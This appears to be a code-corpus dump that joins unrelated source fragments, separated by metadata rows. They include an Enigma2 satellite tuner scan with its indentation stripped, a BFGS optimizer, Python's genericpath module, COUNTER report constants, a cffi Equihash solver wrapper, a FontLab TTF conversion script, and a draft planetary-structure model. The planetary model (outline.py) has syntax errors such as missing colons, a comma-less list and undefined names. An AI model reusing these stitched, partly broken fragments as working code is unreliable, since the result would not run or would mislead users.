self.statusTimer = eTimer()
self.statusTimer.callback.append(self.statusCallback)
self.tunerStatusTimer = eTimer()
self.tunerStatusTimer.callback.append(self.tunerStatusCallback)
self.startStatusTimer()
def keyCancel(self):
self.abort = True
def keyOK(self):
return
def keyLeft(self):
return
def keyRight(self):
return
def openFrontend(self):
res_mgr = eDVBResourceManager.getInstance()
if res_mgr:
self.raw_channel = res_mgr.allocateRawChannel(self.feid)
if self.raw_channel:
self.frontend = self.raw_channel.getFrontend()
if self.frontend:
return True
return False
def statusCallback(self):
if self.state == 0:
if self.port_index == 0:
self.clearNimEntries()
config.Nims[self.feid].diseqcA.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
elif self.port_index == 1:
self.clearNimEntries()
config.Nims[self.feid].diseqcB.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
elif self.port_index == 2:
self.clearNimEntries()
config.Nims[self.feid].diseqcC.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
elif self.port_index == 3:
self.clearNimEntries()
config.Nims[self.feid].diseqcD.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
if self.nr_of_ports == 4:
config.Nims[self.feid].diseqcMode.value = "diseqc_a_b_c_d"
elif self.nr_of_ports == 2:
config.Nims[self.feid].diseqcMode.value = "diseqc_a_b"
else:
config.Nims[self.feid].diseqcMode.value = "single"
config.Nims[self.feid].configMode.value = "simple"
config.Nims[self.feid].simpleDiSEqCSetVoltageTone = self.simple_tone
config.Nims[self.feid].simpleDiSEqCOnlyOnSatChange = self.simple_sat_change
self.saveAndReloadNimConfig()
self.state += 1
elif self.state == 1:
InitNimManager(nimmanager)
self.tuner = Tuner(self.frontend)
self.tuner.tune(self.sat_frequencies[self.index])
self["statusbar"].setText(_("Checking tuner %d\nDiSEqC port %s for %s") % (self.feid, self.diseqc_ports[self.port_index], self.sat_frequencies[self.index][self.SAT_TABLE_NAME]))
self["tunerstatusbar"].setText(" ")
self.count = 0
self.state = 0
self.startTunerStatusTimer()
return
self.startStatusTimer()
def startStatusTimer(self):
self.statusTimer.start(100, True)
def setupSave(self):
self.clearNimEntries()
for x in self.found_sats:
if x[0] == "A":
config.Nims[self.feid].diseqcA.value = "%d" % (x[1])
elif x[0] == "B":
config.Nims[self.feid].diseqcB.value = "%d" % (x[1])
elif x[0] == "C":
config.Nims[self.feid].diseqcC.value = "%d" % (x[1])
elif x[0] == "D":
config.Nims[self.feid].diseqcD.value = "%d" % (x[1])
self.saveAndReloadNimConfig()
def setupClear(self):
self.clearNimEntries()
self.saveAndReloadNimConfig()
def clearNimEntries(self):
config.Nims[self.feid].diseqcA.value = "3601"
config.Nims[self.feid].diseqcB.value = "3601"
config.Nims[self.feid].diseqcC.value = "3601"
config.Nims[self.feid].diseqcD.value = "3601"
def saveAndReloadNimConfig(self):
config.Nims[self.feid].save()
configfile.save()
configfile.load()
nimmanager.sec.update()
def tunerStatusCallback(self):
dict = {}
self.frontend.getFrontendStatus(dict)
if dict["tuner_state"] == "TUNING":
self["tunerstatusbar"].setText(_("Tuner status:") + " " + _("TUNING"))
elif dict["tuner_state"] == "LOCKED":
self["tunerstatusbar"].setText(_("Tuner status:") + " " + _("ACQUIRING TSID/ONID"))
self.raw_channel.requestTsidOnid(self.gotTsidOnid)
elif dict["tuner_state"] == "LOSTLOCK" or dict["tuner_state"] == "FAILED":
self["tunerstatusbar"].setText(_("Tuner status:") + " " + _("FAILED"))
self.tunerStopScan(False)
return
self.count += 1
if self.count > 15:
self.startStatusTimer()
else:
self.startTunerStatusTimer()
def startTunerStatusTimer(self):
self.tunerStatusTimer.start(2000, True)
def gotTsidOnid(self, tsid, onid):
self.tunerStatusTimer.stop()
if tsid == self.sat_frequencies[self.index][self.SAT_TABLE_TSID] and onid == self.sat_frequencies[self.index][self.SAT_TABLE_ONID]:
self.tunerStopScan(True)
else:
self.tunerStopScan(False)
def tunerStopScan(self, result):
if self.abort:
self.setupClear()
self.close(False)
return
if result:
self.found_sats.append((self.diseqc_ports[self.port_index], self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS], self.sat_frequencies[self.index][self.SAT_TABLE_NAME]))
self.index = 0
self.port_index += 1
else:
self.index += 1
if len(self.sat_frequencies) == self.index:
self.index = 0
self.port_index += 1
if len(self.found_sats) > 0:
self.list = []
for x in self.found_sats:
self.list.append(getConfigListEntry((_("DiSEqC port %s: %s") % (x[0], x[2]))))
self["config"].l.setList(self.list)
if self.nr_of_ports == self.port_index:
self.state = 99
self.setupSave()
self.close(len(self.found_sats) > 0)
return
for x in self.found_sats:
if x[1] == self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS]:
self.tunerStopScan(False)
return
self.startStatusTimer()
| gpl-2.0 | -2,929,560,875,584,802,300 | 31.338235 | 180 | 0.713847 | false |
mulkieran/pyblk | tests/test_utils.py | 1 | 1744 | # -*- coding: utf-8 -*-
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Anne Mulhern <[email protected]>
"""
tests.test_utils
================
Tests utilities.
.. moduleauthor:: mulhern <[email protected]>
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import pyblk
from ._constants import GRAPH
class TestGraphUtils(object):
"""
Test utilities that work over networkx graphs.
"""
# pylint: disable=too-few-public-methods
def test_roots(self):
"""
Verify that roots are really roots.
"""
roots = pyblk.GraphUtils.get_roots(GRAPH)
in_degrees = GRAPH.in_degree(roots)
assert all(in_degrees[r] == 0 for r in roots)
| gpl-2.0 | -5,400,782,520,455,736,000 | 32.538462 | 77 | 0.706995 | false |
eljost/pysisyphus | deprecated/optimizers/BFGS.py | 1 | 4901 | #!/usr/bin/env python3
import matplotlib.pyplot as plt
import numpy as np
from pysisyphus.helpers import fit_rigid, procrustes
from pysisyphus.optimizers.BacktrackingOptimizer import BacktrackingOptimizer
# [1] Nocedal, Wright - Numerical Optimization, 2006
class BFGS(BacktrackingOptimizer):
def __init__(self, geometry, alpha=1.0, bt_force=20, **kwargs):
super(BFGS, self).__init__(geometry, alpha=alpha,
bt_force=bt_force,
**kwargs)
self.eye = np.eye(len(self.geometry.coords))
try:
self.inv_hessian = self.geometry.get_initial_hessian()
# ChainOfStates objects may not have get_initial_hessian
except AttributeError:
self.inv_hessian = self.eye.copy()
if (hasattr(self.geometry, "internal")
and (self.geometry.internal is not None)):
raise Exception("Have to add hessian projections etc.")
self.log("BFGS with align=True is somewhat broken right now, so "
"the images will be aligned only in the first iteration. "
)
def reset_hessian(self):
self.inv_hessian = self.eye.copy()
self.log("Resetted hessian")
def prepare_opt(self):
if self.is_cos and self.align:
procrustes(self.geometry)
# Calculate initial forces before the first iteration
self.coords.append(self.geometry.coords)
self.forces.append(self.geometry.forces)
self.energies.append(self.geometry.energy)
def scale_by_max_step(self, steps):
steps_max = np.abs(steps).max()
if steps_max > self.max_step:
fact = self.max_step / steps_max
"""
fig, ax = plt.subplots()
ax.hist(steps, bins=20)#"auto")
title = f"max(steps)={steps_max:.04f}, fact={fact:.06f}"
ax.set_title(title)
l1 = ax.axvline(x=self.max_step, c="k")
l2 = ax.axvline(x=-self.max_step, c="k")
ax.add_artist(l1)
ax.add_artist(l2)
fig.savefig(f"cycle_{self.cur_cycle:02d}.png")
plt.close(fig)
"""
steps *= self.max_step / steps_max
return steps
def optimize(self):
last_coords = self.coords[-1]
last_forces = self.forces[-1]
last_energy = self.energies[-1]
unscaled_steps = self.inv_hessian.dot(last_forces)
steps = self.scale_by_max_step(self.alpha*unscaled_steps)
new_coords = last_coords + steps
self.geometry.coords = new_coords
# Hessian rotation seems faulty right now ...
#if self.is_cos and self.align:
# (last_coords, last_forces, steps), _, self.inv_hessian = fit_rigid(
# self.geometry,
# (last_coords,
# last_forces,
# steps),
# hessian=self.inv_hessian)
new_forces = self.geometry.forces
new_energy = self.geometry.energy
skip = self.backtrack(new_forces, last_forces, reset_hessian=True)
if skip:
self.reset_hessian()
self.geometry.coords = last_coords
#self.scale_alpha(unscaled_steps, self.alpha)
return None
# Because we add the step later on we restore the original
# coordinates and set the appropriate energies and forces.
self.geometry.coords = last_coords
self.geometry.forces = new_forces
self.geometry.energy = new_energy
self.forces.append(new_forces)
self.energies.append(new_energy)
# [1] Eq. 6.5, gradient difference, minus force difference
y = -(new_forces - last_forces)
sigma = new_coords - last_coords
# [1] Eq. 6.7, curvature condition
curv_cond = sigma.dot(y)
if curv_cond < 0:
self.log(f"curvature condition {curv_cond:.07} < 0!")
rho = 1.0 / y.dot(sigma)
if ((np.array_equal(self.inv_hessian, self.eye))
# When align = True the above expression will evaluate to
# False. So we also check if we are in the first iteration.
or (self.cur_cycle == 0)):
# [1] Eq. 6.20, p. 143
beta = y.dot(sigma)/y.dot(y)
self.inv_hessian = self.eye*beta
self.log(f"Using initial guess for inverse hessian, beta={beta}")
# Inverse hessian update
A = self.eye - np.outer(sigma, y) * rho
B = self.eye - np.outer(y, sigma) * rho
self.inv_hessian = (A.dot(self.inv_hessian).dot(B)
+ np.outer(sigma, sigma) * rho)
return steps
| gpl-3.0 | -1,036,933,543,861,177,100 | 39.504132 | 86 | 0.550296 | false |
ArcherSys/ArcherSys | Lib/genericpath.py | 1 | 3883 |
"""
Path operations common to more than one OS
Do not use directly. The OS specific modules import the appropriate
functions from this module themselves.
"""
import os
import stat
__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',
'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',
'samestat']
# Does a path exist?
# This is false for dangling symbolic links on systems that support them.
def exists(path):
"""Test whether a path exists. Returns False for broken symbolic links"""
try:
os.stat(path)
except OSError:
return False
return True
# This follows symbolic links, so both islink() and isdir() can be true
# for the same path on systems that support symlinks
def isfile(path):
"""Test whether a path is a regular file"""
try:
st = os.stat(path)
except OSError:
return False
return stat.S_ISREG(st.st_mode)
# Is a path a directory?
# This follows symbolic links, so both islink() and isdir()
# can be true for the same path on systems that support symlinks
def isdir(s):
"""Return true if the pathname refers to an existing directory."""
try:
st = os.stat(s)
except OSError:
return False
return stat.S_ISDIR(st.st_mode)
def getsize(filename):
"""Return the size of a file, reported by os.stat()."""
return os.stat(filename).st_size
def getmtime(filename):
"""Return the last modification time of a file, reported by os.stat()."""
return os.stat(filename).st_mtime
def getatime(filename):
"""Return the last access time of a file, reported by os.stat()."""
return os.stat(filename).st_atime
def getctime(filename):
"""Return the metadata change time of a file, reported by os.stat()."""
return os.stat(filename).st_ctime
# Return the longest prefix of all list elements.
def commonprefix(m):
"Given a list of pathnames, returns the longest common leading component"
if not m: return ''
s1 = min(m)
s2 = max(m)
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
# Are two stat buffers (obtained from stat, fstat or lstat)
# describing the same file?
def samestat(s1, s2):
"""Test whether two stat buffers reference the same file"""
return (s1.st_ino == s2.st_ino and
s1.st_dev == s2.st_dev)
# Are two filenames really pointing to the same file?
def samefile(f1, f2):
"""Test whether two pathnames reference the same actual file"""
s1 = os.stat(f1)
s2 = os.stat(f2)
return samestat(s1, s2)
# Are two open files really referencing the same file?
# (Not necessarily the same file descriptor!)
def sameopenfile(fp1, fp2):
"""Test whether two open file objects reference the same file"""
s1 = os.fstat(fp1)
s2 = os.fstat(fp2)
return samestat(s1, s2)
# Split a path in root and extension.
# The extension is everything starting at the last dot in the last
# pathname component; the root is everything before that.
# It is always true that root + ext == p.
# Generic implementation of splitext, to be parametrized with
# the separators
def _splitext(p, sep, altsep, extsep):
"""Split the extension from a pathname.
Extension is everything from the last dot to the end, ignoring
leading dots. Returns "(root, ext)"; ext may be empty."""
# NOTE: This code must work for text and bytes strings.
sepIndex = p.rfind(sep)
if altsep:
altsepIndex = p.rfind(altsep)
sepIndex = max(sepIndex, altsepIndex)
dotIndex = p.rfind(extsep)
if dotIndex > sepIndex:
# skip all leading dots
filenameIndex = sepIndex + 1
while filenameIndex < dotIndex:
if p[filenameIndex:filenameIndex+1] != extsep:
return p[:dotIndex], p[dotIndex:]
filenameIndex += 1
return p, p[:0]
| mit | -4,081,050,003,796,660,000 | 28.195489 | 78 | 0.661087 | false |
chill17/pycounter | pycounter/constants.py | 1 | 6177 | """Constants used by pycounter."""
NS = {
'SOAP-ENV': "http://schemas.xmlsoap.org/soap/envelope/",
'sushi': "http://www.niso.org/schemas/sushi",
'sushicounter': "http://www.niso.org/schemas/sushi/counter",
'counter': "http://www.niso.org/schemas/counter",
}
METRICS = {
u"JR1": u"FT Article Requests",
u"JR1 GOA": u"Gold Open Access Article Requests",
u"BR1": u"Book Title Requests",
u"BR2": u"Book Section Requests",
u"DB1": [u"Regular Searches",
u"Searches-federated and automated",
u"Result Clicks",
u"Record Views"],
u"DB2": [u"Access denied: concurrent/simultaneous user license exceeded",
u"Access denied: content item not licensed"]
}
DB_METRIC_MAP = {
"search_reg": METRICS["DB1"][0],
"search_fed": METRICS["DB1"][1],
"result_click": METRICS["DB1"][2],
"record_view": METRICS["DB1"][3],
"turnaway": METRICS["DB2"][0],
"no_license": METRICS["DB2"][1]
}
CODES = {
u"Database": u"DB",
u"Journal": u"JR",
u"Book": u"BR",
u"Title": u"TR",
u"Platform": u"PR",
u"Multimedia": u"MR",
u"Consortium": u"CR",
}
# from http://www.niso.org/workrooms/sushi/registry/
# Not all of these are actually supported by pycounter
REPORT_DESCRIPTIONS = {
u'BR1': u'Number of Successful Title Requests by Month and Title',
u'BR2': u'Number of Successful Section Requests by Month and Title',
u'BR3': u'Access Denied to Content Items by Month, Title, and Category',
u'BR4': u'Access Denied to Content Items by Month, Platform, and Category',
u'BR5': u'Total Searches by Month and Title',
u'CR1': u'Number of Successful Full-text Journal Article or Book Chapter '
u'Requests by Month',
u'CR2': u'Total Searches by Month and Database',
u'CR3': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'DB1': u'Total Searches, Result Clicks and Record Views by Month and '
u'Database',
u'DB2': u'Access Denied by Month, Database and Category',
u'JR1': u'Number of Successful Full-Text Article Requests by Month and '
u'Journal',
u'JR1GOA': u'Number of Successful Gold Open Access Full-Text Article '
u'Requests by Month and Journal',
u'JR1a': u'Number of Successful Full-Text Article Requests from an '
u'Archive by Month and Journal',
u'JR2': u'Access Denied to Full Text Articles by Month, Journal, and '
u'Category',
u'JR3': u'Number of Successful Item Requests and Turnaways by Month, '
u'Journal, and Page-Type',
u'JR3mobile': u'Number of Successful Item Requests by Month, Journal, '
u'and Page-Type for usage on a mobile device',
u'JR4': u'Total Searches Run by Month and Collection',
u'JR5': u'Number of Successful Full-Text Article Requests by '
u'Year-of-Publication (YOP) and Journal',
u'MR1': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'MR2': u'Number of Successful Multimedia Full Content Unit Requests by '
u'Month, Collection, and Item Type',
u'PR1': u'Total Searches, Result Clicks, and Record Views by Month and '
u'Platform',
u'TR1': u'Number of Successful Requests for Journal Full-Text Articles '
u'and Book Sections by Month and Title',
u'TR1mobile': u'Number of Successful Requests for Journal Full-Text '
u'Articles and Book Sections by Month and Title '
u'(formatted for normal browsers/delivered to mobile '
u'devices AND formatted for mobile devices/delivered '
u'to mobile devices)',
u'TR2': u'Access Denied to Full-Text Items by Month, Title, and Category',
u'TR3': u'Number of Successful Item Requests by Month, Title, and '
u'Page-Type',
u'TR3mobile': u'Number of Successful Item Requests by Month, Title, '
u'and Page-Type (formatted for normal browsers/delivered '
u'to mobile devices and for mobile devices/delivered to '
u'mobile devices)',
}
HEADER_FIELDS = {
"JR1": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR2": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR3": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"BR1": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR2": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR3": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"DB1": (
u'Database',
u'Publisher',
u'Platform',
u'User Activity',
u'Reporting Period Total',
),
"DB2": (
u'Database',
u'Publisher',
u'Platform',
u'Access denied category',
u'Reporting Period Total',
),
}
TOTAL_TEXT = {
'JR1': u'Total for all journals',
'BR1': u'Total for all titles',
'BR2': u'Total for all titles',
'DB2': u'Total for all databases',
}
| mit | -3,423,670,937,387,437,600 | 32.754098 | 79 | 0.583293 | false |
smwahl/PlLayer | outline.py | 1 | 8657 | import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import matplotlib
from copy import deepcopy
class planet
''' Represents a snapshot of an evoloving planet, with methods
for comparing different snapshots and relating thermal evolution to
time.'''
def __init__(self, params=None, pcopy=None):
''' Create planet snapshot, either with new parameters or with
another planet object.'''
self.layers = []
self.boundaries = []
self.mass = None
self.radius = None
# tracks whether structure (radii,T-profiles) have been calculated since modifications were made
self.structured = False
if not pcopy is none:
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.mass = deepcopy(pcopy.mass)
self.radius = deepcopy(pcopy.layers)
def setLayers(self,layers):
''' Define the layers to be included in the planet snapshot.
Note: incormation not copied'''
self.layers = layers
# add layers consistant with the boundaries
self.boundaries = []
for layer in layers:
lbounds = layer.boundaries
self.boundaries += [ lb for lb in lbounds if lb not in self.boundaries ]
def setBoundaries(self,boundaries):
''' Define the layers to be included in the planet snapshot.
Note: Information not copied'''
self.boundaries = boundaries
# add layers consistant with the boundaries
self.layers = []
for bound in boundaries:
blayers = bound.layers
self.layers += [ bl for bl in blayers if bl not in self.layers ]
# Following functions will probably be feature of the more specific model,
# might want to add placeholder functions, however.
# def stepT(dT,boundary):
# ''' Simulated timestep in which a boundaries lower temperature is
# changed by dT'''
# def QtoTime(self,dQ):
# ''' Placeholder, should be defined by specific model '''
# def diff(comp_snapshot):
# ''' Compare energy and entropy budgets of various layers. Relates the
# difference to a heat flow for one snapshot to evolve into the previous one.'''
# def structure(T,boundary):
# ''' Integrate Strucuture, specifing the temperature at a boundary '''
def budgets():
''' Report integrated energy and entropy budgets for layers in the planet'''
pass
class xlznCorePlanet(planet):
''' Represent particular situation of a crystallizing metallic core with a
simple model for mantle evoloution'''
def __init__(self,planet_file=None,pcopy=None):
''' Initizialize xlznCorePlanet object. Will eventually want to take input
file names as arguments.'''
if not pcopy is None:
self.mantle = deepcopy(pcopy.mantle)
self.core = deepcopy(pcopy.core)
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.surface = deepcopy(pcopy.surface)
self.cmb = deepcopy(pcopy.cmb)
self.icb = deepcopy(pcopy.icb)
self.center = deepcopy(pcopy.center)
self.mass = pcopy.mass
self.radius = pcopy.radius
self.mantle_density = pcopy.mantle_density
self.core_mass = pcopy.core_mass
self.structured = pcopy.structured
return None
# Define materials from text files
rock = material('simpleSilicateMantle.txt')
liqFeS = material('binaryFeS.txt',mtype='liquid')
solFe = material('simpleSolidIron.txt')
# Define melting/solidifcation relationships under consideration
liqFeS.interpLiquidus('FeS',solFe)
self.mantle = layer('mantle',material=rock)
self.core = xlznLayer('core', material=liqFeS, layernames=['outer_core','inner_core'],
boundnames=['icb'])
# set list of layers (self.core.layers should initially return a sinlge liquid layer
self.layers = [self.mantle] + self.core.layers
# set list of boundaries
self.boundaries = GenerateBoundaries(self.layers,['surface','cmb','center'])
self.surface = boundaries[0], self.cmb = boundaries[1], self.center = boundaries[-1]
self.icb = None # indicates icb has yet to form
# read in parameters from file and decide whether this is new planet or a continuation
# at a different condition
try:
params = parseParamFile(open(planet_file,'r'))
except:
raise Exception('File not found: {}'.format(planet_file))
try:
cmb.r = params.Rcore
self.mass = params.Mplanet
self.radius = params.Rplanet
core_radius = params.Rcore
self.cmb.r = core_radius
self.surface.r = self.radius
self.mantle_density = None
self.core_mass = None
self.center.P = P0
self.cmb.T = params.Tcmb
smode = 'initial'
except:
try:
self.mass = params.Mplanet
self.mantle_density = params.rhomantle
self.core_mass = params.Mcore
self.core.M = core_mass
self.center.P = P0
self.cmb.T = params.Tcmb
self.radius = None
smode = 'cont'
except:
raise Exception('Invalid input file.')
# Integrate structure (making entire stucture consistant with starting values
success = self.structure(mode=smode)
# should check to make sure the integration succeeded
if success:
self.radius = self.surface.r
#self.mantle_density =
self.core_mass = pcopy.core.M
self.structured = pcopy.structured
Mplanet = self.mass
Mcore = self.core_mass
rhomantle = self.mantle_density
PO = self.center.P
params = [ Mplanet Mcore rhomantle P0]
# write new parameter file to run a planet with consistent mass and mantle density
writeParamFile(open('./xlzncoreplanet_cont.txt','w'),params)
return None
else
raise Exception
class layer(object):
''' A layer is a portion of a planet with an adiabatic temperature profile,
composed of a single material '''
def __init__(self,name='',mass=None,material=None,comp=None):
self.name = name
self.boundaries = None
self.mass = mass
self.material = material
self.comp = comp
def specEnergy():
pass
class liquidLayer(layer):
''' A liquid layer has a specific entropy which can be related to viscous and/or
ohmic dissipation.'''
def specEntropy():
pass
class xlznLayer(object):
''' Defines a layer of liquid material that is free to crystalize upon cooling.
Contains a list of solids with a corresponding liquidus. Upon intersection
of the liquidus, there are three possible occurances upon intersection with
a liquidus.
1) solid more dense and adiabat remains below liquidus to the bottom of the
layer, forming a settled region at the bottom.
2) Identical case with less dense settling to the top
3) 'Snow' regime, where sink/floating crystals would remelt before settling
for 1) and 2) a separate solid layer is formed. For 3) the liquid adiabat
is instead constrained to follow the liquidus'''
self.name
self.liquid
self.solids
self.comp # Mass ratio of different components
self.mass
self.liquidi # a liquidi corresponding to each solid phase
self.adiabat # a modified adiabat, following the liquidus in a 'snow' region.
class boundary(object):
self.T # upper and lower temperature
self.d
self.layers
def calcEnergy():
pass
def calcEntropy():
pass
class Material(object):
'''Class for keeping track of various physical properties of a material and how
these vary as a function of P, T and composition.'''
self.liquidus
self.components
self.td_params # holds functions for returning thermodynamic parameters
def interp_liquidus(data_file,solid):
pass
def set_td_params(self,param_file):
pass
def shellIntegral(funcs,r0=0.,r1=1.,tols=[],limits=[]):
''' Integrate an arbitrary number of function
| mit | -6,883,647,413,842,892,000 | 32.296154 | 104 | 0.621116 | false |
slush0/epycyzm | morpavsolver/__init__.py | 1 | 3468 | # https://github.com/morpav/zceq_solver--bin
from cffi import FFI
import os.path
import inspect
ffi = None
library = None
library_header = """
typedef struct {
char data[1344];
} Solution;
typedef struct {
unsigned int data[512];
} ExpandedSolution;
typedef struct HeaderAndNonce {
char data[140];
} HeaderAndNonce;
typedef struct ZcEquihashSolverT ZcEquihashSolver;
ZcEquihashSolver* CreateSolver(void);
void DestroySolver(ZcEquihashSolver* solver);
int FindSolutions(ZcEquihashSolver* solver, HeaderAndNonce* inputs,
Solution solutions[], int max_solutions);
int ValidateSolution(ZcEquihashSolver* solver, HeaderAndNonce* inputs, Solution* solutions);
void RunBenchmark(long long nonce_start, int iterations);
bool ExpandedToMinimal(Solution* minimal, ExpandedSolution* expanded);
bool MinimalToExpanded(ExpandedSolution* expanded, Solution* minimal);
"""
def load_library(path=None):
global library, ffi
assert library is None
ffi = FFI()
ffi.cdef(library_header)
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'morpavsolver.so')
library = ffi.dlopen(path)
assert library is not None
class Solver:
def __init__(self):
self.solver_ = self.header_ = self.solutions_ = self.solution_to_check_ = None
self._ensure_library()
assert library and ffi
self.solver_ = library.CreateSolver()
self.header_ = ffi.new("HeaderAndNonce*")
self.solutions_ = ffi.new("Solution[16]")
self.solution_to_check_ = ffi.new("Solution*")
self.expanded_tmp_ = ffi.new("ExpandedSolution*")
def __del__(self):
# Free the underlying resources on destruction
library.DestroySolver(self.solver_);
self.solver_ = None
# cffi's cdata are collected automatically
self.header_ = self.solutions_ = self.solution_to_check_ = None
def _ensure_library(self):
# Try to load library from standard
if (library is None):
load_library()
def run_benchmark(self, iterations=10, nonce_start=0):
library.RunBenchmark(nonce_start, iterations)
def find_solutions(self, block_header):
assert len(block_header) == 140
self.header_.data = block_header
return library.FindSolutions(self.solver_, self.header_, self.solutions_, 16);
def get_solution(self, num):
assert(num >= 0 and num < 16)
return bytes(ffi.buffer(self.solutions_[num].data))
def validate_solution(self, block_header, solution):
assert len(block_header) == 140
assert len(solution) == 1344
self.solution_to_check_.data = solution
return library.ValidateSolution(self.solver_, self.header_, self.solution_to_check_);
def list_to_minimal(self, expanded):
if isinstance(expanded, (list, tuple)):
assert len(expanded) == 512
minimal = ffi.new("Solution*")
tmp = self.expanded_tmp_
for i, idx in enumerate(expanded):
tmp.data[i] = idx
expanded = tmp
res = library.ExpandedToMinimal(minimal, expanded)
assert res
return minimal
def minimal_to_list(self, minimal):
tmp = self.expanded_tmp_
res = library.MinimalToExpanded(tmp, minimal)
assert res
result = [tmp.data[i] for i in range(512)]
return result
__all__ = ['Solver', 'load_library']
| mit | 957,639,449,207,624,700 | 28.896552 | 93 | 0.654268 | false |
adobe-type-tools/fontlab-scripts | TrueType/convertToTTF.py | 1 | 28980 | #FLM: Convert PFA/UFO/TXT to TTF/VFB
# coding: utf-8
__copyright__ = __license__ = """
Copyright (c) 2015-2016 Adobe Systems Incorporated. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
__doc__ = """
Convert PFA/UFO/TXT to TTF/VFB
This FontLab script will convert one or more hinted PFA/UFO or TXT files
into TTF files, for use as input for makeOTF.
The script will first ask for a directory, which usually should be the
family's top-most folder. It will then crawl through that folder and
process all input files it finds. In addition to the directory, the script
will also ask for an encoding file. This encoding file is a FontLab '.enc'
file which the script will use for ordering the glyphs.
Note:
This script imports the `Input TrueType Hints` script, therefore needs to be
run from the same folder.
==================================================
Versions:
v1.7 - Jun 17 2016 - Skip 'prep' table processing if the font doesn't have it.
v1.6 - Apr 25 2016 - Replace ttx commands by fontTools operations.
v1.5 - Jul 17 2015 - Turn off the addition of NULL and CR glyphs.
v1.4 - Apr 17 2015 - Support changes made to inputTTHints module.
v1.3 - Apr 02 2015 - Now also works properly on FL Windows.
v1.2 - Mar 26 2015 - Move code reading external `tthints` file to an adjacent
module.
v1.1 - Mar 23 2015 - Allow instructions in x-direction.
v1.0 - Mar 04 2015 - Initial public release (Robothon 2015).
"""
import os
import re
import sys
import time
from FL import *
import fl_cmd
try:
import dvInput_module
dvModuleFound = True
except:
dvModuleFound = False
fl.output = ''
errorHappened = False
# ----------------------------------------------------------------------------------------
# Find and import inputTTHints module:
def findFile(fileName, path):
'Find file of given fileName, starting at path.'
for root, dirs, files in os.walk(path):
if fileName in files:
return os.path.join(root)
else:
return None
moduleName = 'inputTTHints.py'
userFolder = os.path.expanduser('~')
customModulePathMAC = os.sep.join((
userFolder, 'Library', 'Application Support',
'FontLab', 'Studio 5', 'Macros'))
customModulePathPC = os.sep.join((
userFolder, 'Documents', 'FontLab', 'Studio5', 'Macros'))
possibleModulePaths = [fl.userpath, customModulePathMAC, customModulePathPC]
print '\nLooking for %s ... ' % (moduleName)
for path in possibleModulePaths:
modPath = findFile(moduleName, path)
if modPath:
print 'found at %s' % modPath
break
if not modPath:
# Module was not found. World ends.
errorHappened = True
print 'Not found in the following folders:\n%s\n\
Please make sure the possibleModulePaths list in this script \
points to a folder containing %s' % ('\n'.join(possibleModulePaths), moduleName)
else:
# Module was found, import it.
if modPath not in sys.path:
sys.path.append(modPath)
import inputTTHints
# ----------------------------------------------------------------------------------------
MAC = False
PC = False
if sys.platform in ('mac', 'darwin'):
MAC = True
elif os.name == 'nt':
PC = True
